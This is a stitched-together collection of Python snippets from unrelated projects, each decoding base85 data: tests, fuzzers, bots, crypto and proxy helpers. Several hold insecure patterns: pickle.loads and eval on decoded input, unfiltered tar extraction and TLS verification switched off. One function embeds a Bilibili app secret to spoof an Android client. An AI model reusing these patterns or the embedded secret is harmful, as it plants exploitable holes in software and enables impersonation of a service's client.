def fromjson( self, obj): '''Hook for json.load()''' if 'clsname' in obj: cls = obj['clsname'] del obj['clsname'] if cls in ("bytes", "bytearray"): import base64 if cls == "bytes": b = base64.b85decode( obj.s.encode("ascii") ) else: b = bytesarray( base64.b85decode( obj.s.encode("ascii") ) ) return b elif cls in globals(): constructor = globals()[cls] elif cls in self.classes: constructor = self.classes[cls] else: raise IKException(ErrorCode.objectNotExists, cls) try: instance = constructor() except Exception as e: print("Cannot instantiate class {0} : {1}".format( cls, e) ) s = input("Press any key...") sys.exit( -1 ) instance.__dict__ = obj return instance return obj
def test_b85decode(self): eq = self.assertEqual tests = { b'': b'', b'cXxL#aCvlSZ*DGca%T': b'www.python.org', b"""009C61O)~M2nh-c3=Iws5D^j+6crX17#SKH9337X""" b"""AR!_nBqb&%C@Cr{EG;fCFflSSG&MFiI5|2yJUu=?KtV!7L`6nNNJ&ad""" b"""OifNtP*GA-R8>}2SXo+ITwPvYU}0ioWMyV&XlZI|Y;A6DaB*^Tbai%j""" b"""czJqze0_d@fPsR8goTEOh>41ejE#<ukdcy;l$Dm3n3<ZJoSmMZprN9p""" b"""q@|{(sHv)}tgWuEu(7hUw6(UkxVgH!yuH4^z`?@9#Kp$P$jQpf%+1cv""" b"""(9zP<)YaD4*xB0K+}+;a;Njxq<mKk)=;`X~?CtLF@bU8V^!4`l`1$(#""" b"""{Qdp""": bytes(range(255)), b"""VPa!sWoBn+X=-b1ZEkOHadLBXb#`}nd3r%YLqtVJM@UIZOH55pPf$@(""" b"""Q&d$}S6EqEFflSSG&MFiI5{CeBQRbjDkv#CIy^osE+AW7dwl""": b"""abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ""" b"""0123456789!@#0^&*();:<>,. []{}""", b'Zf_uPVPs@!Zf7no': b'no padding..', b'dS!BNAY*TBaB^jHb7^mG00000': b'zero compression\x00\x00\x00\x00', b'dS!BNAY*TBaB^jHb7^mG0000': b'zero compression\x00\x00\x00', b"""LT`0$WMOi7IsgCw00""": b"""Boundary:\x00\x00\x00\x00""", b'Q*dEpWgug3ZE$irARr(h': b'Space compr: ', b'{{': b'\xff', b'|Nj': b'\xff'*2, b'|Ns9': b'\xff'*3, b'|NsC0': b'\xff'*4, } for data, res in tests.items(): eq(base64.b85decode(data), res) eq(base64.b85decode(data.decode("ascii")), res) self.check_other_types(base64.b85decode, b'cXxL#aCvlSZ*DGca%T', b"www.python.org")
def andro_mock(params): '''Simulate Android client Arguments: params Return value: request_string -> str ''' import random import base64 import collections fake_hw = random.Random().randrange(start=0, stop=18000000000000000084).to_bytes(8, 'big').hex() add_req_args = collections.OrderedDict({ 'platform' : 'android', '_device': 'android', '_appver': '424000', '_p': '1', '_down': '0', 'cid': params['cid'], '_tid': '0', 'otype': 'json', '_hwid': fake_hw }) if params['quality'] is not None: add_req_args['quality'] = params['quality'] second_key = 'G&M40GdVRlW-v53V=yvd' second_sec = 'W;bIwGB##4G&y29Vr64yF=H|}HZ(LjH8?gmHeoU`' add_req_args['appkey'] = base64.b85decode(second_key) req_args = add_req_args add_req_args= collections.OrderedDict(sorted(req_args.items())) req_args['sign'] = hashlib.md5(bytes(urllib.parse.urlencode(add_req_args) + base64.b85decode(second_sec).decode('utf-8'), 'utf-8')).hexdigest() return urllib.parse.urlencode(req_args)
def test_b85decode_errors(self): illegal = list(range(33)) + \ list(b'"\',./:[\\]') + \ list(range(128, 256)) for c in illegal: with self.assertRaises(ValueError, msg=bytes([c])): base64.b85decode(b'0000' + bytes([c])) self.assertRaises(ValueError, base64.b85decode, b'|') self.assertRaises(ValueError, base64.b85decode, b'|N') self.assertRaises(ValueError, base64.b85decode, b'|Ns') self.assertRaises(ValueError, base64.b85decode, b'|NsC') self.assertRaises(ValueError, base64.b85decode, b'|NsC1')
def generate_key_from_parts(x: str, y: str, d=None, in_bytes=False): """ used to generate key from x and y sent over the internet :param x: x + y used for pubkey generation :param y: :param d: x+y+d used for private key genereation :return: pubkey object """ if in_bytes: # if in bytes then only for pubkey return base64.b85decode(x.encode())+base64.b85decode(y.encode()) # if d is none returns pubkey return ECC.construct(curve="P-256", point_x=x, point_y=y, d=d)
def test_b85_padding(self): eq = self.assertEqual eq(base64.b85encode(b"x", pad=True), b'cmMzZ') eq(base64.b85encode(b"xx", pad=True), b'cz6H+') eq(base64.b85encode(b"xxx", pad=True), b'czAdK') eq(base64.b85encode(b"xxxx", pad=True), b'czAet') eq(base64.b85encode(b"xxxxx", pad=True), b'czAetcmMzZ') eq(base64.b85decode(b'cmMzZ'), b"x\x00\x00\x00") eq(base64.b85decode(b'cz6H+'), b"xx\x00\x00") eq(base64.b85decode(b'czAdK'), b"xxx\x00") eq(base64.b85decode(b'czAet'), b"xxxx") eq(base64.b85decode(b'czAetcmMzZ'), b"xxxxx\x00\x00\x00")
def load(cls, d): the_config = Config() the_config.debug = d.get('debug', False) try: the_config.jd = { 'username': b85decode(d['jd']['username']).decode(), 'password': b85decode(d['jd']['password']).decode() } except Exception as e: logging.error('获取京东帐号配置出错: ' + repr(e)) return the_config
def andro_mock(tls, params): '''Simulate Android client Arguments: params Return value: request_string -> str ''' import random import base64 import collections our_lvl = 412 url_andr3 = 'http://app.bilibili.com/mdata/android3/android3.ver' if tls == True: url_andr3 = tlsify(url_andr3) _, api_response = fetch_url(url_andr3, user_agent=USER_AGENT_API) api_lvl = int(json.loads(api_response.decode('utf-8'))['upgrade']['ver']) logging.debug('Our simulated API level: %s, latest API level: %s' % (our_lvl, api_lvl)) if api_lvl > our_lvl: logging.warning( 'Bilibili API server indicates the API protocol has been updated, the extraction may not work!' ) fake_hw = random.Random().randrange(start=0, stop=18000000000000000084).to_bytes( 8, 'big') #.hex() add_req_args = collections.OrderedDict({ 'platform': 'android', '_device': 'android', '_appver': '424000', '_p': '1', '_down': '0', 'cid': params['cid'], '_tid': '0', 'otype': 'json', '_hwid': fake_hw }) if params['quality'] is not None: add_req_args['quality'] = params['quality'] second_key = 'G&M40GdVRlW-v53V=yvd' second_sec = 'W;bIwGB##4G&y29Vr64yF=H|}HZ(LjH8?gmHeoU`' add_req_args['appkey'] = base64.b85decode(second_key) req_args = add_req_args add_req_args = collections.OrderedDict(sorted(req_args.items())) req_args['sign'] = hashlib.md5( bytes( urllib.parse.urlencode(add_req_args) + base64.b85decode(second_sec).decode('utf-8'), 'utf-8')).hexdigest() return urllib.parse.urlencode(req_args)
def fuzz(filename): with open(filename, "rb") as fp: data = fp.read() try: base64.b64decode(data) except base64.binascii.Error: pass try: base64.standard_b64decode(data) except base64.binascii.Error: pass try: base64.urlsafe_b64decode(data) except base64.binascii.Error: pass try: base64.b32decode(data) except base64.binascii.Error: pass try: base64.b16decode(data) except base64.binascii.Error: pass try: base64.a85decode(data) # TODO undocumented exception. except ValueError: pass try: base64.a85decode(data, adobe=True) # TODO undocumented exception. except ValueError: pass try: base64.b85decode(data) # TODO undocumented exception. except ValueError: pass assert data == base64.b64decode(base64.b64encode(data)) assert data == base64.standard_b64decode(base64.standard_b64encode(data)) assert data == base64.urlsafe_b64decode(base64.urlsafe_b64encode(data)) assert data == base64.b32decode(base64.b32encode(data)) assert data == base64.b16decode(base64.b16encode(data)) assert data == base64.a85decode(base64.a85encode(data)) assert data == base64.a85decode( base64.a85encode(data, adobe=True), adobe=True) assert data == base64.b85decode(base64.b85encode(data))
def sendFirebase(event): db, stor = startFirebase() ## Date today = date.today() ## Textual month, day and year dateToday = today.strftime("%B %d, %Y") now = datetime.now() dt_string = now.strftime("%d/%m/%Y %H:%M:%S") ## Example image to send random = str(uuid.uuid1()) imagePath = random + ".jpg" print(imagePath) image = BytesIO(base64.b85decode(event['image_bytes']) ) #image_bytes = base64.b85decode(event['image_bytes']) stor.child(imagePath).put(image) ## Set imageURL imageURL = stor.child(imagePath).get_url(None) ## Example data to send data = { "Timestamp": dt_string, "Location": 'Lot 9181', "ImageURL": imageURL } print("data uploaded!") db.child("users").push(data) return data
def __parse(line): example = ffi.new("Example[]", 1) result = dream_go.extract_single_example(line, example) if result != 0: features = np.zeros((19, 19, NUM_FEATURES), 'f2') boost = np.zeros((), 'f4') value = np.zeros((), 'f4') policy = np.zeros((362, ), 'f2') else: features_hat = ffi.buffer(example[0].features, 11552 * ffi.sizeof('float')) policy_hat = ffi.string(example[0].policy) features = np.frombuffer(features_hat, 'f4').astype('f2') value = np.asarray( 1.0 if example[0].color == example[0].winner else -1.0, 'f4') policy = np.fromstring(base64.b85decode(policy_hat), 'f2') if example[0].number <= len(BOOST_PER_MOVE_NUMBER): boost = np.asarray( BOOST_PER_MOVE_NUMBER[example[0].number - 1], 'f4') else: boost = np.asarray(1.0, 'f4') # fix any partial policy policy[example[0].index] += 1.0 - np.sum(policy) return features, boost, value, policy
def b85decode(payload): """ Decode payload - must be ascii text. """ if PY2: raise NotImplementedError("Python 2 can't decode base85-encoded data.") return base64.b85decode(payload)
def decode(m): res = [] try: val = bytes.fromhex(m.decode()) if not check_valid(val): raise ValueError res.append(val) except ValueError: try: val = b32decode(m) if not check_valid(val): raise ValueError res.append(val) except (binascii.Error, ValueError): try: val = b64decode(m) if not check_valid(val): raise ValueError res.append(val) except (binascii.Error, ValueError): try: val = b85decode(m) res.append(val) except binascii.Error: pass return res
async def decode_base85(self, ctx, *, input: str): """ Decode base85 """ try: await self.encryptout(ctx, "base85 -> Text", base64.b85decode(input.encode('UTF-8'))) except Exception: await ctx.send("Invalid base85...")
def decompress_command_output(command_output: str) -> str: """ Decompress command output """ from bz2 import decompress from base64 import b85decode return str(decompress(b85decode(command_output)), "utf-8")
def decode(self, payload, **kwargs): """ Base85 decode content from provided payload :param bytes payload: Payload to be decoded :param **kwargs kwargs: Additional attributes (unused) :returns: Base85 decoded content :rtype: list of tuples """ try: # Decode our payload content = base64.b85decode(payload) # Define the metadata we want to return meta = {} meta['size'] = len(content) # Return the results as a list of tuples return [(meta, content)] except Exception as err: self.log.error("Unable to Base85 decode payload: {}".format(str(err))) return None
def proxy_sdns_query(self): req_bin, client_sock = self.request sdns_req = { "request_id": 1, "query": base64.b85encode(req_bin).decode("ascii"), "username": "******", "auth_token": "testtoken" } # TODO: using a new connection for each request; this is expensive... # TODO: real implementation would require certificate validation ssl_context = ssl.create_default_context() ssl_context.check_hostname = False ssl_context.verify_mode = ssl.CERT_NONE with ssl_context.wrap_socket(socket(AF_INET, SOCK_STREAM)) as sdns_sock: sdns_sock.connect((SDNS_HOST, SDNS_PORT)) # Append trailing newline to indicate the end of the request payload = bytes(json.dumps(sdns_req) + "\n", "ascii") print("Sending SDNS request: '{}'".format(payload)) sdns_sock.sendall(payload) sdns_resp = str(sdns_sock.recv(4096), "ascii") print("Got SDNS response:") print(str(sdns_resp)) try: parsed = json.loads(sdns_resp) if 'status' not in parsed or parsed['status'] != 0 or 'response' not in parsed: print("SDNS request failed") else: client_sock.sendto(base64.b85decode(parsed['response']), self.client_address) except json.JSONDecodeError as e: print("Error: JSON decode failed", e)
def base85_decode(text): try: text = bytes(text, 'utf-8') result = base64.b85decode(text) return result.decode() except: return "解码错误"
def main(): print("importing data....") try: data = json.load(open('data.json')) pprint(data) #printing the data bytesInformation = data["bytes"] #reading out the values print("\nBefore Conversion: {}".format( bytesInformation)) #printing out the bytes info #now we need to convert from base64 to human readable language #convertedBase64 = base64.b64decode(bytesInformation) convertedBase64 = base64.b64decode(bytesInformation) print("After Conversion: {}".format(convertedBase64)) print("Secondary Conversion Test: {}".format( convertedBase64.decode("utf-8"))) #calling manipulate, which will convert into the following way manipulate(bytesInformation) except: print("Error, data not loaded properly") #this is an experiment, to make sure the conversion is working properly print("\nExperiment: {} ".format( base64.b64decode( "TWFuIGlzIGRpc3Rpbmd1aXNoZWQsIG5vdCBvbmx5IGJ5IGhpcyByZWFzb24sIGJ1dCAuLi4=" ))) print("ExperimentV2: {}".format( base64.b85decode("uz6hiDLQ0eCLKwAA9C5uQiUVvDscizBAQDCLHDu8FSU=")))
def handleCAPs( packet ): if not CAPs['actuallyUseThisCrap']: return False if __main__.database['globals']['debug']: print( "Handling CAP: " + str( packet ) ) if " LS :" in packet['rest']: CAPs['server'] = packet['rest'].partition( " LS :" )[2].split() for cap in CAPs['server']: if cap in CAPs['client']: CAPs['enabled'].append( cap ) if CAPs['enabled']: __main__.sendPacket( __main__.makePacket( "CAP REQ :" + " ".join( CAPs['enabled'] ) ) ) return True elif " ACK :" in packet['rest']: CAPs['enabled'] = packet['rest'].partition( " ACK :" )[2].split() if "sasl" in CAPs['enabled']: __main__.sendPacket( __main__.makePacket( "AUTHENTICATE PLAIN" ) ) data = __main__.sock.recv( 512 ).decode( errors="ignore" ) pw = ( base64.b85decode( __main__.database['api']['ircsettings']['pw'] ) ).decode( "utf-8" ) __main__.sendPacket( __main__.makePacket( "AUTHENTICATE " + (base64.b64encode( '\0'.join( (__main__.database['api']['ircsettings']['nick'], __main__.database['api']['ircsettings']['nick'], pw) ).encode( "utf-8" ) )).decode( "utf-8" ) ) ) data = __main__.sock.recv( 2048 ).decode( errors="ignore" ) __main__.sendPacket( __main__.makePacket( "CAP END" ) ) __main__.loggedIn = True return True return False
def decode(string, key): xorCompleteHex = base64.b85decode(string.encode("utf-8")).decode("utf-8").split(" ") xorCompleteInts = [ int(x, base=16) for x in xorCompleteHex ] xorCompleteOctets = [ format(x, 'b').rjust(8).replace(" ", "0") for x in xorCompleteInts ] keyOctets = [ format(x, 'b').rjust(8).replace(" ", "0") for x in [ ord(x) for x in key ] ] while len(keyOctets) < len(xorCompleteOctets): for octet in keyOctets: if len(keyOctets) > len(xorCompleteOctets): break keyOctets = keyOctets + [octet] plainTextOctets = [ "".join([ "1" if Cipher.xor(cipherDigit, keyOctets[i][j]) else "0" for j, cipherDigit in enumerate(cipherOctet) ]) for i, cipherOctet in enumerate(xorCompleteOctets) ] plainTextInts = [int(x, base=2) for x in plainTextOctets] plainTextChars = [chr(x) for x in plainTextInts] plainText = "".join(plainTextChars) return plainText
def process_file_key_message( assembled: bytes, # File decryption key onion_pub_key: bytes, # Onion address of associated contact origin: bytes, # Origin of file key packet (user / contact) contact_list: 'ContactList', # ContactList object file_keys: Dict[ bytes, bytes] # Dictionary of file identifiers and decryption keys ) -> str: """Process received file key delivery message.""" if origin == ORIGIN_USER_HEADER: raise FunctionReturn("File key message from the user.", output=False) try: decoded = base64.b85decode(assembled) except ValueError: raise FunctionReturn("Error: Received an invalid file key message.") ct_hash, file_key = separate_header(decoded, BLAKE2_DIGEST_LENGTH) if len(ct_hash) != BLAKE2_DIGEST_LENGTH or len( file_key) != SYMMETRIC_KEY_LENGTH: raise FunctionReturn("Error: Received an invalid file key message.") file_keys[onion_pub_key + ct_hash] = file_key nick = contact_list.get_contact_by_pub_key(onion_pub_key).nick return nick
def main(): app = dash.Dash() my_css_url = 'https://codepen.io/chriddyp/pen/bWLwgP.css' app.css.append_css({"external_url": my_css_url}) # data = pd.read_csv('data_instalace.csv') # data.y -= 2 # data.x += 10 # data = data.to_numpy()[:, 1:] # data = (data * 4.2).astype(np.uint8) # np.save('x', data) data = np.load(io.BytesIO(gzip.decompress(base64.b85decode(POINTS)))) trace = go.Scatter(x=data[:, 0], y=data[:, 1], mode='markers') data = [trace] layout = dict(width=1000, height=1000, xaxis=dict(title='', zeroline=False, showgrid=False), yaxis=dict(title='', zeroline=False, showgrid=False), hovermode='closest') fig = dict(data=data, layout=layout) app.layout = html.Div(children=[ dcc.Markdown('''# Kontrola instalace Pokud body vytvářejí smysluplné slovo, instalace proběhla uspěšně! Gratulujeme!''' ), dcc.Graph(figure=fig) ], style={'textAlign': 'center'}) app.run_server()
def unprep(x): """ Helper function to deserialize a Python object. """ if COMPRESS or (ENCRYPT_KEY is not None): x = base64.b85decode(x) return literal_eval(decompress_decrypt(x).decode("utf8"))
def unpackTree(data, dest): try: f = io.BytesIO(base64.b85decode(data)) with tarfile.open(fileobj=f, mode="r:xz") as tar: tar.extractall(dest) except OSError as e: raise BuildError("Error unpacking files: {}".format(str(e)))
def read_transport(self, n, timeout_sec): reply = self._request_reply("read_transport", { "n": n, "timeout_sec": timeout_sec }) reply["data"] = base64.b85decode(reply["data"]) return reply
def verify_HMAC(self, supplied_hmac, data: bytes, key: int = None): if key is None: gen_hmac = self.generate_HMAC(data) else: gen_hmac = self.generate_HMAC(data, key) return hmac.compare_digest(gen_hmac, base64.b85decode(supplied_hmac))
def detect_errors(self, packet: bytes) -> bytes: """Handle received packet error detection and/or correction.""" if self.settings.qubes: try: packet = base64.b85decode(packet) except ValueError: raise SoftError( "Error: Received packet had invalid Base85 encoding.") if self.settings.session_serial_error_correction and not self.settings.qubes: try: packet, _ = self.rs.decode(packet) return bytes(packet) except ReedSolomonError: raise SoftError( "Error: Reed-Solomon failed to correct errors in the received packet.", bold=True) else: packet, checksum = separate_trailer(packet, PACKET_CHECKSUM_LENGTH) if hashlib.blake2b( packet, digest_size=PACKET_CHECKSUM_LENGTH).digest() != checksum: raise SoftError( "Warning! Received packet had an invalid checksum.", bold=True) return packet
def rec2(xx): x = [] y = [] s = bz2.decompress( base64.b85decode(xx)).decode("utf-8").strip().split('\n') s = s[1:] s = list(map(lambda x: x[8:-1], s)) s = list( map( lambda x: [ x.split(';')[0].replace('{', '').replace('}', '').replace( '^', '**'), x.split(';')[1].replace('{', '').replace('}', '').replace( '^', '**') ], s)) values = [] st = 0 while st < 1: for i in s: x.append(eval(i[0].replace('t', str(st)))) y.append(eval(i[1].replace('t', str(st))) * (-1)) st += 0.01 fig, ax = plt.subplots() plt.axis('off') ax.scatter(x, y, s=50, color="black") fig.set_size_inches((max(x) - min(x)) / 10, 4.8) fig.savefig("2.png") plt.show() sss = input() letters_extract2("2.png", sss) return sss
def test_real_world_01(self): unit = self.load(encoder='hex') data = json.loads( unit( zlib.decompress( base64.b85decode( 'c-muNWME+U4+J0@1bCQ$L||}baY<^fo=Z_;d1hX^jzU;!QE_H|o~@Cd0SM|SIG5&>loqAh=B1XF6eZ^9C<K%y<zyy%r&fmKXQ$@b' 'CK(u~nWmYi85*XT8YCJgvVzPPMKxB>DYGOuu>d5);*waB$j$_^o0Azx@Pi0$AeX5#z|WnRONtA~=k@e(2?EjrAk4uAB;`N<PXy^s' 'cl32+VA$Bt{U?zX$X7`A2=ZlMs8VBKXlP+z_yrVdc)`F>YQVtoDuIE)Y6b&?c)^@qfi?^bjMF?_978PpmtMZB?OZ5x{NsE1gRL>0' 'DwCE^s-FIjanf>?^D1rj2iCR<IGsI_T)fS=M|6^KwSc(x<ZDOF(heKE$=fGyCd)6rJZ8_Yb@%Ju-~T!HmWEXCKW@=4Gq@wU)9Sv9' 'X)5M#xNu7SreWkxr+D6{E6utiez)9Q`mtRpOm%}eZ`7%`MvhN?HIjC6?3pq3K%7a2=JI0ZRki&2?0WS#mau$V<mi1<HannLvS#YJ' 'n)9!V`c}I?{P4$b_v0P1#&cu%rTS~KHtc-&{NjS8Ysv((?rztwmgy*X!}oHV>_5-FXRQ??_P+9$`<m5LA~wgld79B}o`CW?;d{3G' 'I5>Zwdmz((*s43d!<_$Qy3G4X2cUcu%L@CicDbKJw>F)%KIPvs(Y~fe-Lly`<3do?WIn04>wfd@d&Xj)JLkE1MECk+uX7E2yis0j' '<Ckq|o0?Xq&ph8w*I4xPYvcP4{cO5Rujq<x-gj^2;z+wA63YK(6e)qcb29W+-5(vpnO+Omw+WqI<|X8%?rtzy%VbH*o}ZufSH(=Z' '$GG}%TSn6%(Qlw6>FMg{vd$@?i5mc8JO-@')))) self.assertEqual(len(data), 3) self.assertEqual( data[1]['Data']['LibraryName'], 'System.Drawing, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' ) self.assertEqual(data[2]['Data']['ClassInfo']['ClassName'], 'System.Drawing.Bitmap') self.assertEqual( bytes.fromhex(data[2]['Data']['Members']['Data'])[:6], B'\x89PNG\r\n')
def read_qubes_buffer_file(buffer_file_dir: str = '') -> bytes: """Read packet from oldest buffer file.""" buffer_file_dir = buffer_file_dir if buffer_file_dir else BUFFER_FILE_DIR ensure_dir(f"{buffer_file_dir}/") while not any([f for f in os.listdir(buffer_file_dir) if f.startswith(BUFFER_FILE_NAME)]): time.sleep(0.001) tfc_buffer_file_numbers = [f[(len(BUFFER_FILE_NAME)+len('.')):] for f in os.listdir(buffer_file_dir) if f.startswith(BUFFER_FILE_NAME)] tfc_buffer_file_numbers = [n for n in tfc_buffer_file_numbers if n.isdigit()] tfc_buffer_files_in_order = [f"{BUFFER_FILE_NAME}.{n}" for n in sorted(tfc_buffer_file_numbers, key=int)] try: oldest_buffer_file = tfc_buffer_files_in_order[0] except IndexError: raise SoftError("No packet was available.", output=False) with open(f"{buffer_file_dir}/{oldest_buffer_file}", 'rb') as f: packet = f.read() try: packet = base64.b85decode(packet) except ValueError: raise SoftError("Error: Received packet had invalid Base85 encoding.") os.remove(f"{buffer_file_dir}/{oldest_buffer_file}") return packet
def test_real_world_02(self): unit = self.load() data = json.loads( unit( zlib.decompress( base64.b85decode( 'c-pN~-EP`Q6gEvrK)b76wAx**S}96;(TjjE7#k$Ak{KKbxG@3a2&a+Pj3>eNF#a18!>UprU>~B-*_&NYlbcPl7c2EhKF8y4zVmOc' 'z;WE)xiHJ*#}~O$W}#zKG)3{+h3NReKyl&*<fKvMTh)5Cc6<O*Ow$;h5R}r`#>WTabb(zsLK{8s5ji0##=Fet=fZT8P_(Lo0AmDc' '?k1`B5kavFtE!vOKlrPwe}$`l2%Hq>QNK$P*Vj9F7JHVP=a3Yw#NDEjwZ3<?%W*$H7y9a&HK9~0Gb$_M%U=a<pB=uPcG>g#IU=K#' '8T`{uk(p;N?dQO&&ROqw-?F+k^j&g$>LTp?(&?te!RYb#x19+}s2x)fq=Y_3-*iB*TG_-=UGjwbYiE)Yjld_sZ;TaUM3M6}oR-os' 'r79w~bom&~i)Sq;KdS6L^KV@%6iUoC9`>nR%+*Uag1uaQeR25i&+hEJrz*X($)}H=y|$|;Lx%^IAdBo=;+ZYlX3JHUp|{>R8(A|3' '{B%MxVas1?5cK%2uUllOMO(Sv?+s(~(({!u9E``oN>hSi=wom04O1u7jqJiY8;Hg*nF+IzwbYV1CKO197*P$+1whBQ2+Rn-@Zzju' '0%fHrLD!txY6LU55L=gSI*_A_(e|`EH^J@NowXB7ahjFhB8vuXaYHbydr0B+@p?Gyn^pz(hv!S)^Nh*VQ{vN6+HZ+s1h$nJ${#!p' 'EChi7b88U&F53icxpJ=R7qU4vYAwF&iOo1RK`MiWD>aoY7)<b3wFkV{3kLW?U$zvD4;sF2jOw}&Eomi@<gg)$?MO*tw6sD+b?4{K' 'O1+Vr$Q9{XC>aLO`=)Il9dTSY|IdrXr+axny`BHq%U6~Y+z}ku4syT}K|e`XWeYyMafL#e&0Bhy_a0mC_czFCN|Id@#D*mBwVV2)' 'C7@c~(ORP|I#6_OpwMm$aIf@#ZvXHPLWyjR')))) self.assertEqual([r['Type'] for r in data], [ 'SerializedStreamHeader', 'BinaryLibrary', 'SystemClassWithMembersAndTypes', 'MemberReference', 'ObjectNullMultiple256', 'ClassWithMembersAndTypes' ]) data = data[~0]['Data']['Members'] self.assertEqual( data['<Bundle>k__BackingField']['Members']['_downloadedChecksum'], 'fed577a04637410f2b84e0b680396dc6dfc4994c') self.assertEqual( data['<CommandLine>k__BackingField'], R'"${BUNDLEDIR}\java.exe" -oxqaaaarUa6aZ8iEhpjvydyAOVH1SRnx4z1WOcCD1BkT_nJOqzA2GDJrZWjkEPcHPPomOEoJpkljY' R'jJudpTVxQ_IH6VJsU4UK_hOsYlntC7V6qtOlY4CtPgeCUn1bjrx-ZCEmEEoBZSaLqcxcb68WiuHAqQKzFBYZCgviU9s_Ed5-DbxqH9' R'6ynlc2jeE1TPvJJGZ_-cGJNh1jjVRSjErFKuG866qCz-rcAMjOCb44nCZzVnTwxyo9A-NLTQAZPV081Bj65rrZCuAC3i75ExoHRlPL' R'aH1jDoHlQTh8EO1o3kkVK2T4qht-s7Ap3769qEsreh_pELiYNdmLfA5ei6tIp7VVCTGZaa##' )
def configure_converter(converter: GenConverter): """ Configure the converter for use with the orjson library. * bytes are serialized as base85 strings * datetimes are serialized as ISO 8601 * sets are serialized as lists * mapping keys are coerced into strings when unstructuring """ converter.register_unstructure_hook( bytes, lambda v: (b85encode(v) if v else b"").decode("utf8") ) converter.register_structure_hook(bytes, lambda v, _: b85decode(v)) converter.register_unstructure_hook(datetime, lambda v: v.isoformat()) converter.register_structure_hook( datetime, lambda v, _: datetime.fromisoformat(v) ) def gen_unstructure_mapping(cl: Any, unstructure_to=None): return converter.gen_unstructure_mapping( cl, unstructure_to=unstructure_to, key_handler=str ) converter._unstructure_func.register_func_list( [(is_mapping, gen_unstructure_mapping, True)] )
def on_request(self, context): """Checks the request's signature""" # extra and remove the signature from the query signature = request.query.get("_signature") if signature is None: raise HTTP(403) try: h = self.url_signer.algo(self.url_signer.get_key()) signature = request.query["_signature"] sig_content = base64.b85decode( signature.encode("utf-8")).decode("utf-8") sig_dict = json.loads(sig_content) ts = sig_dict["ts"] salt = sig_dict["salt"] sig = sig_dict["sig"] h.update( self.url_signer.get_info_to_sign(request.fullpath, request.query, ts, salt)) computed_sig = base64.b85encode(h.digest()).decode("utf-8") if sig != computed_sig: raise HTTP(403) # We remove the signature, not to pollute the request. del request.query["_signature"] # Checks the expiration time. if self.url_signer.lifespan is not None: if float(ts) + self.url_signer.lifespan < time.time(): raise HTTP(403) except: raise HTTP(403)
def token_retrieve(request): token = None if 'X_TOKEN' in request.META: token = request.META['X_TOKEN'] elif 'HTTP_X_TOKEN' in request.META: token = request.META['HTTP_X_TOKEN'] if token is not None: if len(token) == 20: token = UUID(hexlify(b85decode(token.encode())).decode()) if len(token) == 25: hasher = Hasher(salt=settings.SECRET_KEY) token = UUID(hasher.decode(token)) try: token = Token.objects.get(id=token, is_active=True, is_anonymous=False) request.user = token.owner if token.due is not None and token.due < timezone.now(): token.is_active = False token.save() token = None except Exception: token = None return token
async def get_db(): if globals.DB_HOST_TYPE == "github": async with globals.http.get(f'https://gist.githubusercontent.com/{globals.GITHUB_GIST_USER}/{globals.GITHUB_GIST_ID}/raw', headers={ 'Authorization': f'Token {globals.GITHUB_GIST_TOKEN}' }) as req: db_data = await req.text() elif globals.DB_HOST_TYPE == "writeas": async with globals.http.post('https://write.as/api/auth/login', headers={ 'Content-Type': 'application/json' }, data=json.dumps({ "alias": globals.WRITE_AS_USER, "pass": globals.WRITE_AS_PASS })) as req: globals.write_as_token = (await req.json())["data"]["access_token"] async with globals.http.get(f"https://write.as/{globals.WRITE_AS_USER}/{globals.WRITE_AS_POST_ID}.txt") as req: db_data = await req.text() else: raise Exception("No valid DB type specified!") decoded = base64.b85decode(db_data.encode("utf-8")) decompressed = zlib.decompress(decoded) async with aiofiles.open('db.sqlite3', 'wb') as f: await f.write(decompressed) await db.init_db() print("Fetched DB!")
def base85d(): n = str(s.get()) m = n.encode("ascii") a = base64.b85decode(m) c = a.decode("ascii") global result result.set(str(c))
def deserializer(x): # Load base85 bytes data x = x[1:].encode('ascii') x = base64.b85decode(x) try: return loads(x) except Exception as ex: raise SerializationError(ex)
def read_observations(f): for line in f: observation = json.loads(line) if 'cache' in observation: observation['cache'] = pickle.loads( base64.b85decode(bytes(observation['cache'], 'ascii'))) yield observation
def finale(self,api='UNDEFINED_VERSION'): if api!=API_VERSION: cherrypy.response.status='400 tiroFinale Version Mismatch' cherrypy.response.headers['Content-Type']='text/plain' return 'You are running tiroFinale client %s while this server runs %s. ' \ 'Visit https://github.com/xmcp/tiroFinale to update your client.'%(api,API_VERSION) data=cherrypy.request.json[1] if cherrypy.request.json[0]: #compression flag try: data=json.loads(zlib.decompress(base64.b85decode(data.encode())).decode()) except Exception as e: cherrypy.response.status='500 Finale Decoding Error' cherrypy.response.headers['Content-Type']='text/plain' return "Finale Error: Cannot decode client's compressed data. %s %s"%(type(e),e) if data['auth']!=PASSWORD: cherrypy.response.status='401 Finale Password Incorrect' cherrypy.response.headers['Content-Type']='text/plain' return 'Finale Error: Your password for tiroFinale is incorrect.' print('finale: %s %s'%(data['method'],data['url'])) if data['reuse']: s=self.session else: s=requests.Session() s.trust_env=False try: res=s.request( data['method'], data['url'], headers=data['headers'], data=base64.b64decode(data['data'].encode()), stream=True, allow_redirects=False, timeout=data['timeout'], verify=False, ) except: cherrypy.response.status='504 Finale Connection Failed' cherrypy.response.headers['Content-Type']='text/plain' return traceback.format_exc() print('finale: [%d] %s'%(res.status_code,data['url'])) def extract(): yield from res.raw.stream(CHUNKSIZE,decode_content=False) def addheader(k): if k in res.headers: cherrypy.response.headers[k]=res.headers[k] cherrypy.response.status='200 Finale Itself OK' addheader('Content-Length') addheader('Content-Encoding') cherrypy.response.headers['X-Finale-Status']=res.status_code cherrypy.response.headers['X-Finale-Reason']=res.reason cherrypy.response.headers['X-Finale-Headers']=json.dumps(dict(res.headers)) return extract()
def recvsafe(self): """ Receive stream from sendsafe(). """ import base64 data = self.as_bytes(self.recvraw()) return base64.b85decode(data)
def retrieve(self, key=None, default=None): """ Retrieves saved value or dict of all saved entries if key is None. """ entry = self.plugin.pyload.db.get_storage(self.plugin.classname, key) if key: if entry is None: value = default else: value = json.loads(b85decode(entry).decode()) else: if not entry: value = default else: value = {k: json.loads(b85decode(v).decode()) for k, v in value.items()} return value
